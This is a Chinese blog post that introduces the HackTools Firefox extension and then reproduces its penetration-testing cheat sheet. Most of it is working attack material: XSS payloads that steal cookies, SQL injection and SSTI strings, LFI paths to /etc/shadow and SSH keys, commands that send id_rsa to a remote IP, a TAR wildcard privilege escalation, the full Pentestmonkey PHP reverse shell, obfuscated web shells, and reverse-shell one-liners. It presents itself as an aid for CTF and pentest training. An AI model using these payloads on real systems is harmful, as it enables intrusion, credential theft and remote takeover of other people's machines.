貓寧~~~

firefox插件hacktools地址：

https://addons.mozilla.org/zh-CN/firefox/addon/hacktools/

HackTools由Ludovic Coulon和Riadh BoUCHAHOUA創建。

這是他們插件製作的初衷：

我們是兩個對計算機安全非常感興趣的學生，這個想法是在我們的CTF培訓期間出現的，我們注意到我們經常使用相同的工具(繪製一個shell，用php反向shell，Base64編碼等等)，這就是當我們想到將大多數工具和有效負載組合在一個地方的想法時，一個簡單的Web應用程序就可以完成這項工作，但是來回移動相當令人沮喪，這就是爲什麼我們想直接在瀏覽器中實現一個擴展

由此，我們可以知道，一個滲透測試工具的目的，是提高生產力，有的時候，一種聚合也是一種創新。

1~xss相關payload

Data grabber for XSS
Obtains the administrator cookie or sensitive access token, the following payload will send it to a controlled page.

XSS in HTML/Applications

Basic Payload

Img tag payload

XSS in Markdown

[a](javascript:prompt(document.cookie))
[a](j a v a s c r i p t:prompt(document.cookie))
[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
[a](javascript:window.onerror=alert;throw%201)

XSS in SVG (short)

Bypass word blacklist with code evaluation

eval('ale'+'rt(0)');
Function('ale'+'rt(1)')();
new Function`alert`6``;
setTimeout('ale'+'rt(2)');
setInterval('ale'+'rt(10)');
Set.constructor('ale'+'rt(13)')();
Set.constructor`alert(14)```;

2~sql注入payload

Generic SQL Injection Payloads

' or '

-- or #

' OR '1

' OR 1 -- -

OR "" = "

" OR 1 = 1 -- -"

' OR '' = '

'='

'LIKE'

'=0--+

OR 1=1

' OR 'x'='x

' AND id IS NULL; --

'''''''''''''UNION SELECT '2

Time-Based

,(select * from (select(sleep(10)))a)

%2c(select%20*%20from%20(select(sleep(10)))a)

';WAITFOR DELAY '0:0:30'--

Generic Error Based Payloads

OR 1=1

OR 1=1#

OR x=y#

OR 1=1--

OR x=x--

OR 3409=3409 AND ('pytW' LIKE 'pytW

HAVING 1=1

HAVING 1=1#

HAVING 1=0--

AND 1=1--

AND 1=1 AND '%'='

WHERE 1=1 AND 1=0--

%' AND 8310=8310 AND '%'='

Authentication Based Payloads

' or ''-'

' or '' '

' or ''&'

' or ''^'

' or ''*'

or true--

" or true--

' or true--

") or true--

') or true--

admin') or ('1'='1'--

admin') or ('1'='1'#

admin') or ('1'='1'/

Order by and UNION Based Payloads

1' ORDER BY 1--+

1' ORDER BY 2--+

1' ORDER BY 3--+

1' ORDER BY 1,2--+

1' ORDER BY 1,2,3--+

1' GROUP BY 1,2,--+

1' GROUP BY 1,2,3--+

' GROUP BY columnnames having 1=1 --

-1' UNION SELECT 1,2,3--+

' UNION SELECT sum(columnname ) from tablename --

-1 UNION SELECT 1 INTO @,@

-1 UNION SELECT 1 INTO @,@,@

1 AND (SELECT * FROM Users) = 1

' AND MID(VERSION(),1,1) = '5';

' and 1 in (select min(name) from sysobjects where xtype = 'U' and name > '.') --

3~Template Injections (SSTI)，模板注入

Template injection allows an attacker to include template code into an existant (or not) template. A template engine makes designing HTML pages easier by using static template files which at runtime replaces variables/placeholders with actual values in the HTML pages

Jinja2 ( Flask / Django )

File reading

{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}

{{ config.items()[4][1].__class__.__mro__[2].__subclasses__()[40]("/etc/passwd").read() }}

Write into a file

{{ ''.__class__.__mro__[2].__subclasses__()[40]('/var/www/html/myflaskapp/hello.txt', 'w').write('Hello here !') }}

4~LFI，本地文件包含

LFI stands for Local File Includes - it’s a file local inclusion vulnerability that allows an attacker to include files that exist on the target web server.

Typically this is exploited by abusing dynamic file inclusion mechanisms that don’t sanitize user input.

Directory traversal

foo.php?file=../../../../../../../etc/passwd

PHP Wrapper php://file

/example1.php?page=expect://ls

PHP Wrapper php://filter

/example1.php?page=php://filter/convert.base64-encode/resource=../../../../../etc/passwd

Useful LFI files

Linux

/etc/passwd

/etc/shadow

/etc/issue

/etc/group

/etc/hostname

/etc/ssh/ssh_config

/etc/ssh/sshd_config

/root/.ssh/id_rsa

/root/.ssh/authorized_keys

/home/user/.ssh/authorized_keys

/home/user/.ssh/id_rsa

/proc/[0-9]*/fd/[0-9]*

/proc/mounts

/home/$USER/.bash_history

/home/$USER/.ssh/id_rsa

/var/run/secrets/kubernetes.io/serviceaccount

/var/lib/mlocate/mlocate.db

/var/lib/mlocate.db

Apache

/etc/apache2/apache2.conf

/usr/local/etc/apache2/httpd.conf

/etc/httpd/conf/httpd.conf

Red Hat/CentOS/Fedora Linux -> /var/log/httpd/access_log

Debian/Ubuntu -> /var/log/apache2/access.log

FreeBSD -> /var/log/httpd-access.log

/var/log/apache/access.log

/var/log/apache/error.log

/var/log/apache2/access.log

/var/log/apache/error.log

MySQL

/var/lib/mysql/mysql/user.frm

/var/lib/mysql/mysql/user.MYD

/var/lib/mysql/mysql/user.MYI

Windows

/boot.ini

/autoexec.bat

/windows/system32/drivers/etc/hosts

/windows/repair/SAM

/windows/panther/unattended.xml

/windows/panther/unattend/unattended.xml

/windows/system32/license.rtf

/windows/system32/eula.txt

5~File Transfer，文件傳遞

Bash Upload

# Upload file over HTTP (require HTTP service running on the attacker machine)

bash -c 'echo -e "POST / HTTP/0.9 $(<id_rsa)" > /dev/tcp/10.10.164.167/1337'

# Exfiltrate file over TCP# Listen with Netcat on port 1337 + output redirection

nc -l -p 1337 > data

bash -c 'cat id_rsa > /dev/tcp/10.10.164.167/1337'

Bash Download

# Send via netcat

nc -l -p 1337 < id_rsa

# Download file on the other machine

bash -c 'cat < /dev/tcp/10.10.164.167/1337 > id_rsa'

Netcat

# Upload payload

nc -lnvp 1337

nc 10.10.164.167 1337 < id_rsa

# Download

nc 10.10.164.167 1337 < id_rsa

nc -lnvp 1337 > file_saved

Python

# Python3 HTTP Server

python3 -m http.server 1337

# Python2 HTTP Server

python -m SimpleHTTPServer 1337

SCP

# Upload from local host to remote computer

scp id_rsa [email protected]:~/destination -P 1337

# Download from remote computer

scp [email protected]:~/path_to_file file_saved -P 1337

6~Useful Linux command for your Penetration Testing

SUID Commands

find / -user root -perm -4000 -print 2>/dev/null

find / -perm -u=s -type f 2>/dev/null

find / -user root -perm -4000 -exec ls -ldb {} ;

find / -type f -name '*.txt' 2>/dev/null

What version of the system ?

cat /etc/issue

cat /etc/*-release

cat /etc/lsb-release

cat /etc/redhat-release

What is its kernel version ?

cat /proc/version

uname -a

uname -mrs

rpm -q kernel

dmesg | grep Linux

ls /boot | grep vmlinuz

What is the environment variables ?

cat /etc/profile

cat /etc/bashrc

cat ~/.bash_profile

cat ~/.bashrc

cat ~/.bash_logout

env

set

Service settings, there is any wrong allocation?

cat /etc/syslog.conf

cat /etc/chttp.conf

cat /etc/lighttpd.conf

cat /etc/cups/cupsd.conf

cat /etc/inetd.conf

cat /etc/apache2/apache2.conf

cat /etc/my.conf

cat /etc/httpd/conf/httpd.conf

cat /opt/lampp/etc/httpd.conf

ls -aRl /etc/ | awk ‘$1 ~ /^.*r.*/

Is there any cron jobs ?

crontab -l

ls -alh /var/spool/cron

ls -al /etc/ | grep cron

ls -al /etc/cron*

cat /etc/cron*

cat /etc/at.allow

cat /etc/at.deny

cat /etc/cron.allow

cat /etc/cron.deny

cat /etc/crontab

cat /etc/anacrontab

cat /var/spool/cron/crontabs/root

Other users host communication with the system ?

lsof -i

lsof -i :80

grep 80 /etc/services

netstat -antup

netstat -antpx

netstat -tulpn

chkconfig --list

chkconfig --list | grep 3:on

last

How to port forwarding ?

# FPipe.exe -l [local port] -r [remote port] -s [local port] [local IP]

FPipe.exe -l 80 -r 80 -s 80 192.168.1.7

# ssh -[L/R] [local port]:[remote ip]:[remote port] [local user]@[local ip]

ssh -L 8080:127.0.0.1:80 [email protected] # Local Port

ssh -R 8080:127.0.0.1:80 [email protected] # Remote Port

# mknod backpipe p ; nc -l -p [remote port] < backpipe | nc [local IP] [local port] >backpipe

mknod backpipe p ; nc -l -p 8080 < backpipe | nc 10.1.1.251 80 >backpipe # Port Relay

mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow 1>backpi...

backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc

localhost 80 | tee -a outflow & 1>backpipe # Proxy monitor (Port 80 to 8080)

TAR wildcard cronjob privilege escalation

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <your ip> 1234 >/tmp/f" > shell.sh

touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"

touch "/var/www/html/--checkpoint=1"

7~TTY Spawn Shell

Often during pen tests you may obtain a shell without having tty, yet wish to interact further with the system. Here are some commands which will allow you to spawn a tty shell. Obviously some of this will depend on the system environment and installed packages.

Python spawn shell

python -c 'import pty; pty.spawn("/bin/sh")'

Fully Interactive TTY

All the steps to stabilize your shell

# In the reverse shell

python -c 'import pty; pty.spawn("/bin/sh")'

ctrl+z

# Attacker Machine

stty raw -echo

# In the reverse shell

reset

export SHELL=bash

export TERM=xterm-256color

stty rows [num] columns [cols]

OS system spawn shell

echo os.system("/bin/bash")

Bash spawn shell

/bin/sh -i

Perl spawn shell

perl —e 'exec "/bin/sh";'

Python spawn shell

ruby: exec "/bin/sh"

Lua spawn shell

lua: os.execute("/bin/sh")

IRB spawn shell

exec "/bin/sh"

VI spawn shell

:!bash

VI(2) spawn shell

:set shell=/bin/bash:shell

Nmap spawn shell

!sh

8~PHP Reverse Shell

Attackers who successfully exploit a remote command execution vulnerability can use a reverse shell to obtain an interactive shell session on the target machine and continue their attack.

Pentestmonkey's reverse shell

This script will make an outbound TCP connection to a hardcoded IP and port

  <?php
  // php-reverse-shell - A Reverse Shell implementation in PHP
  // Copyright (C) 2007 [email protected]

  set_time_limit (0);
  $VERSION = "1.0";
  $ip = '';  // You have changed this
  $port = ;  // And this
  $chunk_size = 1400;
  $write_a = null;
  $error_a = null;
  $shell = 'uname -a; w; id; /bin/sh -i';
  $daemon = 0;
  $debug = 0;

  //
  // Daemonise ourself if possible to avoid zombies later
  //

  // pcntl_fork is hardly ever available, but will allow us to daemonise
  // our php process and avoid zombies.  Worth a try...
  if (function_exists('pcntl_fork')) {
    // Fork and have the parent process exit
    $pid = pcntl_fork();
    
    if ($pid == -1) {
      printit("ERROR: Can't fork");
      exit(1);
    }
    
    if ($pid) {
      exit(0);  // Parent exits
    }

    // Make the current process a session leader
    // Will only succeed if we forked
    if (posix_setsid() == -1) {
      printit("Error: Can't setsid()");
      exit(1);
    }

    $daemon = 1;
  } else {
    printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
  }

  // Change to a safe directory
  chdir("/");

  // Remove any umask we inherited
  umask(0);

  //
  // Do the reverse shell...
  //

  // Open reverse connection
  $sock = fsockopen($ip, $port, $errno, $errstr, 30);
  if (!$sock) {
    printit("$errstr ($errno)");
    exit(1);
  }

  // Spawn shell process
  $descriptorspec = array(
    0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
    1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
    2 => array("pipe", "w")   // stderr is a pipe that the child will write to
  );

  $process = proc_open($shell, $descriptorspec, $pipes);

  if (!is_resource($process)) {
    printit("ERROR: Can't spawn shell");
    exit(1);
  }

  // Set everything to non-blocking
  // Reason: Occsionally reads will block, even though stream_select tells us they won't
  stream_set_blocking($pipes[0], 0);
  stream_set_blocking($pipes[1], 0);
  stream_set_blocking($pipes[2], 0);
  stream_set_blocking($sock, 0);

  printit("Successfully opened reverse shell to $ip:$port");

  while (1) {
    // Check for end of TCP connection
    if (feof($sock)) {
      printit("ERROR: Shell connection terminated");
      break;
    }

    // Check for end of STDOUT
    if (feof($pipes[1])) {
      printit("ERROR: Shell process terminated");
      break;
    }

    // Wait until a command is end down $sock, or some
    // command output is available on STDOUT or STDERR
    $read_a = array($sock, $pipes[1], $pipes[2]);
    $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

    // If we can read from the TCP socket, send
    // data to process's STDIN
    if (in_array($sock, $read_a)) {
      if ($debug) printit("SOCK READ");
      $input = fread($sock, $chunk_size);
      if ($debug) printit("SOCK: $input");
      fwrite($pipes[0], $input);
    }

    // If we can read from the process's STDOUT
    // send data down tcp connection
    if (in_array($pipes[1], $read_a)) {
      if ($debug) printit("STDOUT READ");
      $input = fread($pipes[1], $chunk_size);
      if ($debug) printit("STDOUT: $input");
      fwrite($sock, $input);
    }

    // If we can read from the process's STDERR
    // send data down tcp connection
    if (in_array($pipes[2], $read_a)) {
      if ($debug) printit("STDERR READ");
      $input = fread($pipes[2], $chunk_size);
      if ($debug) printit("STDERR: $input");
      fwrite($sock, $input);
    }
  }

  fclose($sock);
  fclose($pipes[0]);
  fclose($pipes[1]);
  fclose($pipes[2]);
  proc_close($process);

  // Like print, but does nothing if we've daemonised ourself
  // (I can't figure out how to redirect STDOUT like a proper daemon)
  function printit ($string) {
    if (!$daemon) {
      print "$string
";
    }
  }

  ?>

Basic RCE

When you have successfully uploaded your payload, just put your commands after the variable ?cmd= (ex: ?cmd=ls -la")

<?php system($_GET["cmd"]);?

Obfuscate PHP Web Shell

<?=`$_GET[0]`?>

Usage : http://target.com/path/to/shell.php?0=command

<?=`$_POST[0]`?>

Usage : curl -X POST http://target.com/path/to/shell.php -d "0=command"

<?=`{$_REQUEST['_']}`?>

Usage :

- http://target.com/path/to/shell.php?_=command

- curl -X POST http://target.com/path/to/shell.php -d "_=command" '

<?=$_="";$_="'" ;$_=($_^chr(4*4*(5+5)-40)).($_^chr(47+ord(1==1))).($_^chr(ord('_')+3)).($_^chr(((10*10)+(5*3))));$_=${$_}['_'^'o'];echo`$_`?>

Usage :

- http://target.com/path/to/shell.php?0=command

<?php $_="{"; $_=($_^"<").($_^">;").($_^"/"); ?><?=${'_'.$_}['_'](${'_'.$_}['__']);?>

Usage :

- http://target.com/path/to/shell.php?_=function&__=argument

- http://target.com/path/to/shell.php?_=system&__=ls

9~Reverse shell

A reverse shell is a shell session established on a connection that is initiated from a remote machine, not from the local host.

bash -c 'exec bash -i &>/dev/tcp/192.168.100.100/100 <&1'

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.100.100 100 >/tmp/f

php -r '$sock=fsockopen(getenv("192.168.100.100"),getenv("100"));exec("/bin/sh -i <&3 >&3 2>&3");'

perl -e 'use Socket;$i="$ENV{192.168.100.100}";$p=$ENV{100};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

python -c 'import sys,socket,os,pty;s=socket.socket() s.connect((os.getenv("192.168.100.100"),int(os.getenv("100")))) [os.dup2(s.fileno(),fd) for fd in (0,1,2)] pty.spawn("/bin/sh")'

ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV["192.168.100.100"],ENV["100"]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

TF=$(mktemp -u); mkfifo $TF && telnet 192.168.100.100 100 0<$TF | /bin/sh 1>$TF

over~~~

PJzhang:Firefox滲透測試插件HackTools樣例

Generic SQL Injection Payloads

Time-Based

Generic Error Based Payloads

Authentication Based Payloads

Order by and UNION Based Payloads

3~Template Injections (SSTI)，模板注入

Jinja2 ( Flask / Django )

File reading

Write into a file

Directory traversal

PHP Wrapper php://file

PHP Wrapper php://filter

Useful LFI files

Linux

Apache

MySQL

Windows

Bash Upload

Bash Download

Netcat

Python

SCP

SUID Commands

What version of the system ?

What is its kernel version ?

What is the environment variables ?

Service settings, there is any wrong allocation?

Is there any cron jobs ?

Other users host communication with the system ?

How to port forwarding ?

TAR wildcard cronjob privilege escalation

Python spawn shell

Fully Interactive TTY

All the steps to stabilize your shell

OS system spawn shell

Bash spawn shell

Perl spawn shell

Python spawn shell

Lua spawn shell

IRB spawn shell

VI spawn shell

VI(2) spawn shell

Nmap spawn shell

Pentestmonkey's reverse shell

Basic RCE

Obfuscate PHP Web Shell